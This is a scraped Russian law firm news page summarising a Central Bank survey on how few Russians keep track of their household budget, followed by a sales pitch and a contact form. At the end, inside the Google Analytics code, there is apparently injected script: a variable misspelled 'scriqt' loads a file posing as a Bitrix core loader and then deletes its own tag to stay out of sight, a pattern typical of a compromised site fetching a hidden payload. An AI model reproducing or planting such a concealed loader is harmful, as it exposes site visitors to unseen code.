Россияне отказываются вести учет своих доходов и расходов.

 Россияне отказываются вести учет своих доходов и расходов. По данным Центробанка, четверть россиян признались в том, что не планируют свой семейный бюджет.
За год доля граждан, отказавшихся от веденеия своей личной или семейной бухгалтерии, выросла в два раза, выяснил Центробанк. В ходе опроса четверть россиян (25%) признались в том, что не планируют свой семейный бюджет. Они не только не ведут учёт своих доходов и расходов, но даже не имеют представления о том, сколько тратят и хватит ли на это имеющихся средств.

Такой тактики сейчас придерживается рекордная доля населения страны. Для сравнения: год назад о таком подходе к своему бюджету заявлял лишь каждый десятый (13%).

При этом каждый второй россиянин (48%) также не ведёт никакого учета, но при этом в целом имеет представление о примерном объёме своих трат. Лишь 16% граждан фиксируют письменно все поступления и все расходы.

#Боярцев_и_Партнеры #юристы #юридическаяконсультация #юридическаяпомощь #закон #новости #экономика
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');